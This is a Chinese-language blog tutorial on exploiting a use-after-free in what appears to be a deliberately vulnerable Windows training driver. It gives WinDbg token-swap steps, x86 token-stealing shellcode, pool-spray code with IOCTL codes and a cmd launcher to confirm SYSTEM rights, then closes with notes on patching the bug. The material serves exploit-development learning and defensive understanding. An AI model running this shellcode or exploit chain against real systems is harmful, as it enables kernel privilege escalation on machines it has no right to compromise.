Jcxp's blog love and peace

windows-kernel-exploit:uaf

2019-07-03
jcxp

   

x64

获取cmd的token

  1. 使用!process 0 1 cmd.exe获取cmd的地址
  2. 使用dt _eprocess查看token位置
  3. 使用dd+地址获取cmd的token值

然后修改为system的token

  1. 使用同样的方式获取system的token
  2. 使用ed+地址+值修改cmd的token为system的token

x86

漏洞原理

提权原理

首先我们要明白一个道理,运行一个普通的程序在正常情况下是没有系统权限的,但是往往在一些漏洞利用中,我们会想要让一个普通的程序达到很高的权限就比如系统权限,下面做一个实验,我们在虚拟机中用普通权限打开一个cmd然后断下来,用!dml_proc命令查看当前进程的信息

kd> !dml_proc
Address  PID  Image file name
865cd8e8 4    System         
89cff600 10c  smss.exe       
88178030 164  csrss.exe      
...
8345f030 ff0  cmd.exe        
886785f8 ff8  conhost.exe 

我们可以看到System的地址是 865cd8e8 ,cmd的地址是 8345f030 ,我们可以通过下面的方式查看地址中的成员信息,这里之所以 +f8 是因为token的位置是在进程偏移为 0xf8 的地方,也就是Value的值,那么什么是token?你可以把它比做等级,不同的权限等级不同,比如系统权限等级是5级(最高),那么普通权限就好比是1级,我们可以通过修改我们的等级达到系统的5级权限,这也就是提权的基本原理,如果我们可以修改进程的token为系统的token,那么就可以提权成功,我们手动操作一次下面是修改前token值的对比

kd> dt nt!_EX_FAST_REF 865cd8e8+f8
   +0x000 Object           : 0x8b401273 Void
   +0x000 RefCnt           : 0y011
   +0x000 Value            : 0x8b401273  \\system token
kd> dt nt!_EX_FAST_REF 8345f030+f8
   +0x000 Object           : 0xa599049a Void
   +0x000 RefCnt           : 0y010
   +0x000 Value            : 0xa599049a  \\cmd token

我们通过ed命令修改cmd token的值为system token

kd> ed  8345f030+f8 8b401273
kd> dt nt!_EX_FAST_REF 8345f030+f8
   +0x000 Object           : 0x8b401273 Void
   +0x000 RefCnt           : 0y011
   +0x000 Value            : 0x8b401273

whoami命令发现权限已经变成了系统权限

我们将上面的操作变为汇编的形式如下

void ShellCode()
{
    _asm
    {
        nop
        nop
        nop
        nop
        pushad
        mov eax,fs:[124h]        // 找到当前线程的_KTHREAD结构
        mov eax, [eax + 0x50]    // 找到_EPROCESS结构
        mov ecx, eax
        mov edx, 4    // edx = system PID(4)
 
        // 循环是为了获取system的_EPROCESS
    find_sys_pid:
        mov eax, [eax + 0xb8]    // 找到进程活动链表
        sub eax, 0xb8            // 链表遍历
        cmp [eax + 0xb4], edx    // 根据PID判断是否为SYSTEM
        jnz find_sys_pid
 
        // 替换Token
        mov edx, [eax + 0xf8]
        mov [ecx + 0xf8], edx
        popad
        ret
    }
}

fs寄存器在Ring0中指向一个称为KPCR的数据结构,即FS段的起点与 KPCR 结构对齐,而在Ring0中fs寄存器一般为0x30,这样fs:[124]就指向KPRCB数据结构的第四个字节。由于 KPRCB 结构比较大,在此就不列出来了。查看其数据结构可以看到第四个字节指向CurrentThead(KTHREAD类型)。这样fs:[124]其实是指向当前线程的_KTHREAD

kd> dt nt!_KTHREAD
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 CycleTime        : Uint8B
   +0x018 HighCycleTime    : Uint4B
   +0x020 QuantumTarget    : Uint8B
   +0x028 InitialStack     : Ptr32 Void
   +0x02c StackLimit       : Ptr32 Void
   +0x030 KernelStack      : Ptr32 Void
   +0x034 ThreadLock       : Uint4B
   +0x038 WaitRegister     : _KWAIT_STATUS_REGISTER
   +0x039 Running          : UChar
   +0x03a Alerted          : [2] UChar
   +0x03c KernelStackResident : Pos 0, 1 Bit
   +0x03c ReadyTransition  : Pos 1, 1 Bit
   +0x03c ProcessReadyQueue : Pos 2, 1 Bit
   +0x03c WaitNext         : Pos 3, 1 Bit
   +0x03c SystemAffinityActive : Pos 4, 1 Bit
   +0x03c Alertable        : Pos 5, 1 Bit
   +0x03c GdiFlushActive   : Pos 6, 1 Bit
   +0x03c UserStackWalkActive : Pos 7, 1 Bit
   +0x03c ApcInterruptRequest : Pos 8, 1 Bit
   +0x03c ForceDeferSchedule : Pos 9, 1 Bit
   +0x03c QuantumEndMigrate : Pos 10, 1 Bit
   +0x03c UmsDirectedSwitchEnable : Pos 11, 1 Bit
   +0x03c TimerActive      : Pos 12, 1 Bit
   +0x03c SystemThread     : Pos 13, 1 Bit
   +0x03c Reserved         : Pos 14, 18 Bits
   +0x03c MiscFlags        : Int4B
   +0x040 ApcState         : _KAPC_STATE
   +0x040 ApcStateFill     : [23] UChar
   +0x057 Priority         : Char
   +0x058 NextProcessor    : Uint4B
   +0x05c DeferredProcessor : Uint4B
   +0x060 ApcQueueLock     : Uint4B
   +0x064 ContextSwitches  : Uint4B
   +0x068 State            : UChar
   +0x069 NpxState         : Char
   +0x06a WaitIrql         : UChar
   +0x06b WaitMode         : Char
   +0x06c WaitStatus       : Int4B
   +0x070 WaitBlockList    : Ptr32 _KWAIT_BLOCK
   +0x074 WaitListEntry    : _LIST_ENTRY
   +0x074 SwapListEntry    : _SINGLE_LIST_ENTRY
   +0x07c Queue            : Ptr32 _KQUEUE
   +0x080 WaitTime         : Uint4B
   +0x084 KernelApcDisable : Int2B
   +0x086 SpecialApcDisable : Int2B
   +0x084 CombinedApcDisable : Uint4B
   +0x088 Teb              : Ptr32 Void
   +0x090 Timer            : _KTIMER
   +0x0b8 AutoAlignment    : Pos 0, 1 Bit
   +0x0b8 DisableBoost     : Pos 1, 1 Bit
   +0x0b8 EtwStackTraceApc1Inserted : Pos 2, 1 Bit
   +0x0b8 EtwStackTraceApc2Inserted : Pos 3, 1 Bit
   +0x0b8 CalloutActive    : Pos 4, 1 Bit
   +0x0b8 ApcQueueable     : Pos 5, 1 Bit
   +0x0b8 EnableStackSwap  : Pos 6, 1 Bit
   +0x0b8 GuiThread        : Pos 7, 1 Bit
   +0x0b8 UmsPerformingSyscall : Pos 8, 1 Bit
   +0x0b8 VdmSafe          : Pos 9, 1 Bit
   +0x0b8 UmsDispatched    : Pos 10, 1 Bit
   +0x0b8 ReservedFlags    : Pos 11, 21 Bits
   +0x0b8 ThreadFlags      : Int4B
   +0x0bc ServiceTable     : Ptr32 Void
   +0x0c0 WaitBlock        : [4] _KWAIT_BLOCK
   +0x120 QueueListEntry   : _LIST_ENTRY

再来看看_EPROCESS的结构,+0xb8处是进程活动链表,用于储存当前进程的信息,我们通过对它的遍历,可以找到system的token,我们知道system的PID一直是4,通过这一点我们就可以遍历了,遍历到系统token之后替换就行了

kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER
   +0x0a8 ExitTime         : _LARGE_INTEGER
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : Ptr32 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY
   +0x0c0 ProcessQuotaUsage : [2] Uint4B
   +0x0c8 ProcessQuotaPeak : [2] Uint4B
   +0x0d0 CommitCharge     : Uint4B
   +0x0d4 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : Ptr32 _PS_CPU_QUOTA_BLOCK

UAF原理

如果你是一个pwn选手,那么肯定很清楚UAF的原理,简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况:

  • 内存块被释放后,其对应的指针被设置为 NULL,然后再次使用,自然程序会崩溃。
  • 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。
  • 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题。

而我们一般所指的 Use After Free 漏洞主要是后两种。此外,我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。类比Linux的内存管理机制,Windows下的内存申请也是有规律的,我们知道ExAllocatePoolWithTag函数中申请的内存并不是胡乱申请的,操作系统会选择当前大小最合适的空闲堆来存放它。如果你足够细心的话,在源码中你会发现在UseUaFObject中存在g_UseAfterFreeObject->Callback();的片段,如果我们将Callback覆盖为shellcode就可以提权了

typedef struct _USE_AFTER_FREE {
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE, *PUSE_AFTER_FREE;
 
PUSE_AFTER_FREE g_UseAfterFreeObject = NULL;
 
NTSTATUS UseUaFObject() {
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    PAGED_CODE();
 
    __try {
        if (g_UseAfterFreeObject) {
            DbgPrint("[+] Using UaF Object\n");
            DbgPrint("[+] g_UseAfterFreeObject: 0x%p\n", g_UseAfterFreeObject);
            DbgPrint("[+] g_UseAfterFreeObject->Callback: 0x%p\n", g_UseAfterFreeObject->Callback);
            DbgPrint("[+] Calling Callback\n");
 
            if (g_UseAfterFreeObject->Callback) {
                g_UseAfterFreeObject->Callback(); // g_UseAfterFreeObject->shellcode();
            }
 
            Status = STATUS_SUCCESS;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }
 
    return Status;
}

0x02:漏洞利用

利用思路

如果我们一开始申请堆的大小和UAF中堆的大小相同,那么就可能申请到我们的这块内存,假如我们又提前构造好了这块内存中的数据,那么当最后释放的时候就会指向我们shellcode的位置,从而达到提取的效果。但是这里有个问题,我们电脑中有许许多多的空闲内存,如果我们只构造一块假堆,我们并不能保证刚好能够用到我们的这块内存,所以我们就需要构造很多个这种堆,换句话说就是堆海战术吧,如果你看过0day安全这本书,里面说的堆喷射也就是这个原理。

利用代码

根据上面我们已经得到提权的代码,相当于我们只有子弹没有枪,这样肯定是不行的,我们首先伪造环境

typedef struct _FAKE_USE_AFTER_FREE
{
    FunctionPointer countinter;
    char bufffer[0x54];
}FAKE_USE_AFTER_FREE, *PUSE_AFTER_FREE;
 
PUSE_AFTER_FREE fakeG_UseAfterFree = (PUSE_AFTER_FREE)malloc(sizeof(FAKE_USE_AFTER_FREE));
fakeG_UseAfterFree->countinter = ShellCode;
RtlFillMemory(fakeG_UseAfterFree->bufffer, sizeof(fakeG_UseAfterFree->bufffer), 'A');

接下来我们进行堆喷射

for (int i = 0; i < 5000; i++)
{
    // 调用 AllocateFakeObject() 对象
    DeviceIoControl(hDevice, 0x22201F, fakeG_UseAfterFree, 0x60, NULL, 0, &recvBuf, NULL);
}

你可能会疑惑上面的IO控制码是如何得到的,这是通过逆向分析IrpDeviceIoCtlHandler函数得到的,我们通过DeviceIoControl函数实现对驱动中函数的调用,下面原理相同

// 调用 UseUaFObject() 函数
DeviceIoControl(hDevice, 0x222013, NULL, NULL, NULL, 0, &recvBuf, NULL);
// 调用 FreeUaFObject() 函数
DeviceIoControl(hDevice, 0x22201B, NULL, NULL, NULL, 0, &recvBuf, NULL);

如果你不清楚DeviceIoControl函数的话可以参考官方文档

BOOL DeviceIoControl(
  HANDLE       hDevice,
  DWORD        dwIoControlCode,
  LPVOID       lpInBuffer,
  DWORD        nInBufferSize,
  LPVOID       lpOutBuffer,
  DWORD        nOutBufferSize,
  LPDWORD      lpBytesReturned,
  LPOVERLAPPED lpOverlapped
);

最后我们需要一个函数来调用 cmd 窗口检验我们是否提权成功

static VOID CreateCmd()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

0x03:补丁思考

对于 UseAfterFree, 漏洞利用是在 free 掉了对象之后再次对它的引用,如果我们增加一个条件,判断对象是否为空,如果为空则不调用,那么就可以避免 UseAfterFree 的发生,而在FreeUaFObject()函数中指明了安全的措施,我们只需要把g_UseAfterFreeObject置为NULL

#ifdef SECURE
            // Secure Note: This is secure because the developer is setting
            // 'g_UseAfterFreeObject' to NULL once the Pool chunk is being freed
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);
 
            g_UseAfterFreeObject = NULL;
#else
            // Vulnerability Note: This is a vanilla Use After Free vulnerability
            // because the developer is not setting 'g_UseAfterFreeObject' to NULL.
            // Hence, g_UseAfterFreeObject still holds the reference to stale pointer
            // (dangling pointer)
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);

下面是在UseUaFObject()函数中的修复方案:

if(g_UseAfterFreeObject != NULL)
{
    if (g_UseAfterFreeObject->Callback) {
        g_UseAfterFreeObject->Callback();
    }
}

Similar Posts

Comments